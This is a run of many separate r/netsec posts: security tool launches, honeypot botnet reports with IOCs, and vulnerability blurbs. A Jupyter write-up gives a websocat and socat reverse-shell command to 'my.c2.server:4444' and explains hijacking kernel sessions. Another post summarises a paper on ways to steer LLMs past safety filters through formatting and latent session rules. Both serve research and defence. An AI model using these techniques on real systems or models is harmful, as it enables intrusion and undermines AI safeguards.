Hi everyone,

My best friend and I have been working on a project after going through CCNA → CCNP ENCOR → CCNP ENARSI together. We realised that for most people (including us), the hardest part of the CCNA journey isn’t the technical content. It’s staying motivated through the long PDFs, the repetitive labs, and the feeling of studying alone.

We wanted to take some of that pain away and make learning networking feel more structured, more guided, and more rewarding. So we started building something based on short lessons, clear diagrams, and a gamification system that helps you actually feel your improvement.

The idea is to help learners stay consistent, avoid feeling lost, and have a more enjoyable path through the CCNA topics.

We’re currently sharing this with CCNA learners and mentors to see if it actually helps, and we’d definitely welcome any feedback or questions :)

Anthropic just published a case study where threat actors jailbroke Claude and used it to run entire attack campaigns autonomously.

I built npmscan.com because npm has become a minefield. Too many packages look safe on the surface but hide obfuscated code, weird postinstall scripts, abandoned maintainers, or straight-up malware. Most devs don’t have time to manually read source every time they install something — so I made a tool that does the dirty work instantly.

What npmscan.com does:

• Scans any npm package in seconds
• Detects malicious patterns, hidden scripts, obfuscation, and shady network calls
• Highlights abandoned or suspicious maintainers
• Shows full file structure + dependency tree
• Assigns a risk score based on real security signals
• No install needed — just search and inspect

The goal is simple:
👉 Make it obvious when a package is trustworthy — and when it’s not.

If you want to quickly “x-ray” your dependencies before you add them to your codebase, you can try it here:

https://npmscan.com

Let me know what features you’d want next.

I recently completed a project on “Scanning and Enumeration with Nmap” using Kali Linux and Metasploitable2. The project includes network discovery, port scanning, service enumeration, NSE scripting, and vulnerability detection. I’ve documented all findings, screenshots, and results in a structured report. I’m sharing it here to get feedback and suggestions to improve my methodology and reporting style.

#DevTown #nmap #cybersecurity

FaceSeek is like Google Images but mostly for faces. It uses facial photos and reverse photo finding method to recognition and detect a face even if it’s cropped or filtered. Plus it also ad modify those faaces to some body and make videos out of them. This could be useful for OSINT or threat hunting, but it also means attackers could find out our digital footprints by photo. Is it a threat? Or not? Considering that there are already a lot Ai tools like these, But Ai is alvo improving daily.

So my honeypot just caught something interesting: RedTail malware hitting exposed Docker APIs on port 2375/tcp.

For context, RedTail is typically known for exploiting PHP vulnerabilities, PAN-OS, and Ivanti, but not a single vendor mentions Docker in their threat reports.

I did a pretty extensive research dive across:

• Threat intel reports (Akamai, Forescout, Trend Micro, Kaspersky)
• SANS ISC, VirusTotal, Malpedia
• GitHub repos and academic papers
• Various community discussions

What I confirmed:

• C2 IP: 178[.]16[.]55[.]224 (AS214943)
• User-Agent: "libredtail-http" (consistent with RedTail)
• Absolutely zero public documentation of RedTail targeting Docker

Two theories:

1. This is a blind spot in threat intelligence reporting
2. We're seeing a new tactical evolution of RedTail (as of Nov 2025)

Has anyone else seen similar activity?

Analysis of the Milvus Proxy Authentication Bypass Vulnerability(CVE-2025-64513)

After we launched SysReptor a few years ago, we now published the data leak service "SysLeaks for Attackers". We're still refining the service and kindly ask for your feedback. You can use SysLeaks quite extensively during the BETA phase, which will remain open in November.

How it works:
You search for domain names and receive usernames/email addresses, plaintext passwords and (in some cases) the platform the account was used for.

Limitations:

• Users must sign up with their company email address (we approve offensive security companies only to prevent abuse).
• We don't disclose the leaks of the last 14 days as a grace period for affected companies.
• Free 50 credits for up to 2.500 leaked accounts per week (during the BETA phase)

Hello! Earlier this year I found an interesting logic quirk in an open source library, and now I wrote a medium article about it.

This is my first article ever, so any feedback is appreciated.

TLDR: mPDF is an open source PHP library for generating PDFs from HTML. Because of some logic quirks, it is possible to trigger web requests by providing it with a crafted input, even in cases where it is sanitized.

This post is not about a vulnerability! Just an unexpected behavior I found when researching an open source lib. (It was rejected by MITRE for a CVE)

The vulnerability was a critical stored HTML Injection that allowed any free account to send zero-barrier phishing emails from the trusted [no-reply@doordash.com](mailto:no-reply@doordash.com) domain. The flaw existed for 5 years and was kept out of DoorDash's hands for 15 months by a misclassification in the HackerOne VDP process.

This blogpost covering one of the most popular agentic workflow development platforms — Dify.
It covers how simple misconfigurations can lead to the theft of critical enterprise assets, and just how common these misconfigurations actually are.

“Updated version with detailed vulnerability breakdown is now live here

Hey folks — I’ve got a Throwing Star LAN Tap (replica) and I’m using it for passively capturing traffic for lab troubleshooting and packet analysis. I’m curious about real-world experience: how much latency did you actually measure when inserting a tap like this into a gigabit link? Any numbers (µs/ms) from hardware vs. inline solutions, or tips on test methodology you recommend?

For context: I’m planning to use it for troubleshooting, capturing brief bursts for analysis, and teaching/demoing packet flows — so low added latency is important but I’m not running production workloads through it. Appreciate any real measurements, test setups, or pitfall warnings.

I wrote a short blog post about a bug I discovered in late 2023 affecting Android Enterprise BYOD devices managed through Microsoft Intune, which lets the user install arbitrary apps in the dedicated Work Profile. The issue still exists today and Android considered this not a security risk: https://jgnr.ch/sites/android_enterprise.html

If you’re using this setup, you might find it interesting.

Yes, I know I know... But believe me, when I started it I thought I was a genius.

"Oh I can do that", I thought to myself in that moment of 'inspiration', "I bet nobody thought of it yet, have they?".

And like any self-proclaimed good developer, I started hacking at it. I never thought to ask the Internet if it's a good idea. I was convinced!

Boy, was I wrong!

All of this to say, I am proud of my tech newsletter 🙈 I worked hard on the concept, I manually edit and pick the articles that go our every (work) day, and the close beta testers have expressed it brings great value to them.

I publish five newsletters everyday, covering Platform, Tech, AI, Web Development, and Crypto. I also publish the Top Headlines narrated on the landing page of the website.

Would you give me some feedback about my baby? It is unique to me, even if it's actually not 🙈

https://www.mergeconflictdigest.com

LANDFALL — a commercial-grade Android spyware exploiting a now-patched Samsung zero-day (CVE-2025-21042) through weaponized DNG images sent via WhatsApp, enabling zero-click compromise of Samsung Galaxy devices.

This isn't an isolated incident. LANDFALL is part of a larger DNG exploitation wave. Within months, attackers weaponized image parsing vulnerabilities across Samsung (CVE-2025-21042, CVE-2025-21043) and Apple (CVE-2025-43300 chained with WhatsApp CVE-2025-55177 for delivery)

It seems like DNG image processing libraries became a new attack vector of choice – suspiciously consistent across campaigns. Samsung had two zero-days in the same library, while a parallel campaign hit iOS - all exploiting the same file format. Should we expect more?

Developed a tool that parses IOCs and creates relationships with known threat reporting

I've built an OSINT Cybersecurity Threat Intelligence Platform for Windows.

Features:

• Dual Mode Operation (CLI + UI)
• Curated OSINT Ingestion
• Analyst-grade Summaries
• MITRE ATT&CK Mapping
• IOC Extraction + Enrichment
• SIEM/EDR Integration via TAXII/STIX/CSV
• No cloud - works offline
• Perfect for isolated or air-gapped environments
• No data collection

The Windows Installer is free to download.

Licenses are being given out for free during the Beta.

Feedback, testing and feature suggestions are welcome.

I’ve been working on a side project to help bug bounty hunters discover lesser-known programs that are not listed on platforms like HackerOne or Bugcrowd as you know they are crowded.

I have added around 100+ programs that I found through google dorks and I have many more so will be adding it very soon. Each programs has its own page showing if they offer reward, swag or hall of fame and I also break down the reward from low to high.

Have been doing bug bounty my self and I know that a lot of programs are out there and I kept a personal list, and figured — why not turn it into something public and helpful for the community.

Also have added blog posts from bug bounty hunters and plan on growing the blog collection as well.

Would love to get your feedback — ideas, suggestions, anything broken, or stuff you’d like to see added (especially if you write blogs yourself). Totally open to contributors too.

I want https://bugbountydirectory.com to be a one stop place for bug bounty hunters.

A vulnerability in the Windows Cloud File API allows attackers to bypass a previous patch and regain arbitrary file write, which can be used to achieve local privilege escalation.

This is not a vulnerability in Jupyter. This is a code execution feature working as designed. When Jupyter is properly configured with token authentication (the default), this technique wouldn't work. The issue comes about when administrators disable security features and run Jupyter with elevated privileges—a dangerous combination on a shared machine.

For those unfamiliar, Jupyter is the Swiss Army knife of data science—a web-based environment where researchers and analysts write code, visualize data, and document their findings all in one place. It’s code execution as a service, basically.

My first instinct was to check if the Jupyter server was accessible

It was. The API was responding, and even better—no authentication token required. This meant the server was either running with --NotebookApp.token='' or I was accessing it from a trusted network. Either way, Christmas came early.

WebSockets and Terminals

Here's where things got a little more interesting. Jupyter's REST API documentation showed an interesting endpoint: /api/terminals. Unlike the kernel API (which executes Python code), the terminal API provides actual shell access. And I could create a terminal session fairly easily.

But there’s a catch. Terminals in Jupyter communicate over WebSocket, not HTTP. Traditional tools like curl or nc wouldn't work. I needed something that could speak WebSocket from the command line.

After some research, I discovered websocat—essentially netcat for WebSockets. It's a binary that bridges the gap between command-line tools and WebSocket services. Perfect for situations like this.

Abusing the Terminal API

With websocat in hand, I could now interact with Jupyter's terminal WebSocket, but it wasn’t immediately obvious how to send commands from there terminal. The Jupyter Client WebSocket documentation on WebSocket protocols provides some details about how messages are passed between kernels and the Jupyter web application. And the Terminado client’s websocket implementation outlines the format needed to interact with Jupyter.

So when you connect to a Jupyter terminal via WebSocket, you're not getting a raw shell - you're talking to a protocol handler that expects JSON arrays where the

• first element is message type ("stdin", "stdout", "setup", etc.)
• second element is the payload (for stdin, it's the command text)

This lets Jupyter multiplex different data streams (input, output, control messages) over a single WebSocket connection. So sending ["stdin", "command"] is how you talk to Jupyter's terminal WebSocket protocol.

And when you connect, it seems to take a second to initialize the WebSocket connection, and it wouldn’t immediately take my commands, so the elegant solution is to sleep. And so, echoing a command like this:‍

UID 0? Of course, the Jupyter server was running as root, and the terminal API was giving me a root shell. No sudo required, no privilege escalation needed—just ask nicely and receive.

Accessing Kernel Secrets

With root access through the terminal, I could now read Jupyter's runtime files:

These kernel connection files contained:

• Connection ports for each running kernel
• HMAC signing keys for message authentication
• Session information

With these, I could connect directly to any running notebook kernel and execute code in other users' sessions. Session hijacking for data science.

For easier interaction, I established a proper reverse shell:

$ (sleep 1; echo '["stdin", "socat exec:\\"bash -li\\",pty,stderr,setsid,sigint,sane tcp:my.c2.server:4444 &\\n"]'; sleep 1; echo '["stdin", "exit\\n"]') | ./websocat "ws://localhost:8888/terminals/websocket/1"

Now I had a fully interactive root shell, running through Jupyter's own process. To any monitoring system, this might look like legitimate Jupyter activity.

This isn't a vulnerability in Jupyter—it's a deployment anti-pattern.

1. Running as root - Jupyter was running with root privileges, probably because someone needed GPU access or wanted to avoid permission issues
2. No authentication - The server was started with authentication disabled, for convenience
3. Exposed terminal API - The terminal feature was enabled (default in many installations)

Together, these created a perfect storm. Any user with local access could escalate to root through Jupyter's intended functionality.

Don’t Run Jupyter as Root

If you need multi-user Jupyter, use tools designed for it:

Need GPU access without root? Use capabilities:

Map out what users actually need:

• Read/write to their notebook directory?
• Install pip packages? → User-writable virtual environment
• Access GPUs? → Device permissions, not root
• Run system commands? → Whitelist specific commands with sudo (but be careful with this)

If users legitimately need shell access, try isolate it properly.

So don’t run services as root because it's easier. Or disable authentication for convenience. Treat development defaults as production-ready.

Jupyter is great for interactive data science. The terminal API is genuinely useful for package installation and environment debugging. But these same features are ripe for abuse if deployed without proper consideration.

Downloading websocat and echoing commands is fine for janky use, but how about a little client to drop into a shell?

Check out jupyter-shell

I was cleaning up my dependencies last month and realized ChatGPT had suggested "rails-auth-token" to me. Sounds legit, right? Doesn't exist on RubyGems.

The scary part: if I'd pushed that to GitHub, an attacker could register it with malware and I'd install it on my next build. Research shows AI assistants hallucinate non-existent packages 5-21% of the time.

I built SlopGuard to catch this before installation. It:

• Verifies packages actually exist in registries (RubyGems, PyPI, Go modules)
• Uses 3-stage trust scoring to minimize false positives
• Detects typosquats and namespace attacks
• Scans 700+ packages in 7 seconds

Tested on 1000 packages: 2.7% false positive rate, 96% detection on known supply chain attacks.

Built in Ruby, about 2500 lines, MIT licensed.

GitHub: https://github.com/aditya01933/SlopGuard

Background research and technical writeup: https://aditya01933.github.io/aditya.github.io/

Homepage https://aditya01933.github.io/aditya.github.io/slopguard

Main question: Would you actually deploy this or is the problem overstated? Most devs don't verify AI suggestions before using them.

CVE-2025-38593

2025-08-15

< 6.12.42

Through our honeypot (https://github.com/mariocandela/beelzebub), I’ve identified a major evolution of the RondoDox botnet, first reported by FortiGuard Labs in 2024.

The newly discovered RondoDox v2 shows a dramatic leap in sophistication and scale:
🔺 +650% increase in exploit vectors (75+ CVEs observed)
🔺 New C&C infrastructure on compromised residential IPs
🔺 16 architecture variants
🔺 Open attacker signature: bang2013@atomicmail[.]io
🔺 Targets expanded from DVRs and routers to enterprise systems

The full report includes:
- In-depth technical analysis (dropper, ELF binaries, XOR decoding)
- Full IOC list
- YARA and Snort/Suricata detection rules
- Discovery timeline and attribution insights

The paper analyzes trust between stages in LLM and agent toolchains. If intermediate representations are accepted without verification, models may treat structure and format as implicit instructions, even when no explicit imperative appears. I document 41 mechanism level failure modes.

Scope

• Text-only prompts, provider-default settings, fresh sessions.
• No tools, code execution, or external actions.
• Focus is architectural risk, not operational attack recipes.

Selected findings

• §8.4 Form-Induced Safety Deviation: Aesthetics/format (e.g., poetic layout) can dominate semantics -> the model emits code with harmful side-effects despite safety filters, because form is misinterpreted as intent.
• §8.21 Implicit Command via Structural Affordance: Structured input (tables/DSL-like blocks) can be interpreted as a command without explicit verbs (“run/execute”), leading to code generation consistent with the structure.
• §8.27 Session-Scoped Rule Persistence: Benign-looking phrasing can seed a latent session rule that re-activates several turns later via a harmless trigger, altering later decisions.
• §8.18 Data-as-Command: Fields in data blobs (e.g., config-style keys) are sometimes treated as actionable directives -> the model synthesizes code that implements them.

Mitigations (paper §10)

• Stage-wise validation of model outputs (semantic + policy checks) before hand-off.
• Representation hygiene: normalize/label formats to avoid “format -> intent” leakage.
• Session scoping: explicit lifetimes for rules and for the memory
• Data/command separation: schema aware guards

Limitations

• Text-only setup; no tools or code execution.
• Model behavior is time dependent. Results generalize by mechanism, not by vendor.

Bluetooth Low Energy (BLE) powers hundreds of millions of IoT devices — trackers, medical sensors, smart home systems, and more. Understanding these communications is essential for security research and reverse engineering. In our latest article, we explore the specific challenges of sniffing a frequency-hopping BLE connection with a Software Defined Radio (SDR), the new possibilities this approach unlocks, and its practical limitations. 🛠️ What you’ll learn: Why SDRs (like the HackRF One) are valuable for BLE analysis The main hurdles of frequency hopping — and how to approach them What this means for security audits and proprietary protocol discovery ➡️ Read the full post on the blog 

I've just published my analysis on RondoDox v2, and the numbers speak for themselves: +650% exploit vectors compared to v1 documented by FortiGuard Labs.

Key Findings:
- 15+ exploitation vectors (from 2 CVEs to enterprise-grade attacks)
- C&C on compromised residential IP (multiple AWS EC2)
- 16 architectures supported with XOR obfuscation (key: 0x21)
- Open attribution: [bang2013@atomicmail.io](mailto:bang2013@atomicmail.io)

🚨 What concerns me:
The jump from consumer DVR/routers to enterprise targets demonstrates an aggressive expansion strategy.
We're no longer talking about a "simple" DDoS botnet.

🟢 IOCs and detection rules: YARA, Snort/Suricata and complete IOC list available in the full post.

AI and security are starting to converge in more practical ways. This year’s Black Hat Europe Arsenal shows that trend clearly, and this article introduces 8 open-source tools that reflect the main areas of focus. Here’s a preview of the 8 tools mentioned in the article:

BOF available at: https://github.com/TierZeroSecurity/teams-cookies-bof

Overview

If you have open positions at your company for information security professionals and would like to hire from the /r/netsec user base, please leave a comment detailing any open job listings at your company.

We would also like to encourage you to post internship positions as well. Many of our readers are currently in school or are just finishing their education.

Please reserve top level comments for those posting open positions.

Rules & Guidelines

Include the company name in the post. If you want to be topsykret, go recruit elsewhere. Include the geographic location of the position along with the availability of relocation assistance or remote work.

• If you are a third party recruiter, you must disclose this in your posting.
• Please be thorough and upfront with the position details.
• Use of non-hr'd (realistic) requirements is encouraged.
• While it's fine to link to the position on your companies website, provide the important details in the comment.
• Mention if applicants should apply officially through HR, or directly through you.
• Please clearly list citizenship, visa, and security clearance requirements.

You can see an example of acceptable posts by perusing past hiring threads.

Feedback

Feedback and suggestions are welcome, but please don't hijack this thread (use moderator mail instead.)

I wrote a short piece on how to actually quantify the classic Swiss-cheese model of defense instead of just showing it in slides.

Using Bayesian updating, I show how you can take EPSS scores for CVEs on an asset, layer in control effectiveness (like firewall, EDR, etc.), and update those probabilities over time as you get real data.

It’s a lightweight, data-driven way to express how much your defenses actually reduce exploit likelihood, and it ties nicely into FAIR-CAM thinking too.

Would love feedback or discussion from anyone doing something similar with telemetry or Bayesian models.

VulScan-MCP scans project dependencies for latest known CVEs from NVD and OSV databases in real time

Integrates with VS Code and GitHub Copilot. Ask "Check for security vulnerabilities" and it scans your manifest files.

Only reports actual CVEs, not deprecated packages or outdated versions.

Doesn't auto-patch anything. Just provides information and remediation guidance in easy to follow language.

Source code: https://github.com/abhishekrai43/VulScan-MCP

Marketplace: Search "VulScan-MCP"

Questions regarding netsec and discussion related directly to netsec are welcome here, as is sharing tool links.

Rules & Guidelines

• Always maintain civil discourse. Be awesome to one another - moderator intervention will occur if necessary.
• Avoid NSFW content unless absolutely necessary. If used, mark it as being NSFW. If left unmarked, the comment will be removed entirely.
• If linking to classified content, mark it as such. If left unmarked, the comment will be removed entirely.
• Avoid use of memes. If you have something to say, say it with real words.
• All discussions and questions should directly relate to netsec.
• No tech support is to be requested or provided on r/netsec.

As always, the content & discussion guidelines should also be observed on r/netsec.

Feedback

Feedback and suggestions are welcome, but don't post it here. Please send it to the moderator inbox.

EDR-Redir V2 can redirect entire folders like "Program Files" to point back to themselves, except for the folders of Antivirus, EDR. This means that other software continues to function normally, while only the EDR is redirected or blocked.

COM (Component Object Model) and DCOM (Distrubuted COM) have been interesting components in Windows from a security perspective for many years. In the past, COM has been a target for many purposes. Not only have many vulnerabilities been discovered in COM, but it is also used for lateral movement or bypassing techniques.

This white paper describes how COM/DCOM works and what complications it has. In the next chapters, the white paper will describe how security research can be automated using the fuzzing approach. Since this approach comes with some problems, it describes how these problems were overcome (at least partially).

I've been working on a different approach to pickle security with a friend.
We wrote up a blog post about it and built a challenge to test if it actually holds up. The basic idea: we intercept and block the dangerous operations at the interpreter level during deserialization (RCE, file access, network calls, etc.). Still experimental, but we tested it against 32+ real vulnerabilities and got <0.8% performance overhead.
Blog post with all the technical details: https://iyehuda.substack.com/p/we-may-have-finally-fixed-pythons
Challenge site (try to escape): https://pickleescape.xyz
Curious what you all think - especially interested in feedback if you've dealt with pickle issues before or know of edge cases we might have missed.

I think one of the interesting parts in methodology is that due to structure of the integration between Lovable front-ends and Supabase backends via API, and the fact that certain high-value signals (for example, anonymous JWTs to APIs linking Supabase backends) only appear in frontend bundles or source output, we needed to introduce a lightweight, read-only scan to harvest these artifacts and feed them back into the attack surface management inventory.

Here is the blog article that describes our methodology in depth.

In a nutshell, we found:

- 2k medium vulns, 98 highly critical issues

- 400+ exposed secrets

- 175 instances of PII (including bank details and medical info)

- Several confirmed BOLA, SSRF, 0-click account takeover and others

I wrote a blog post about the recent onslaught of Zendesk spam emails and how a design flaw in its Anonymous Authentication feature was exploited.

HelixGuard found a dozen malicious extensions in the VSCode marketplace targeting developers.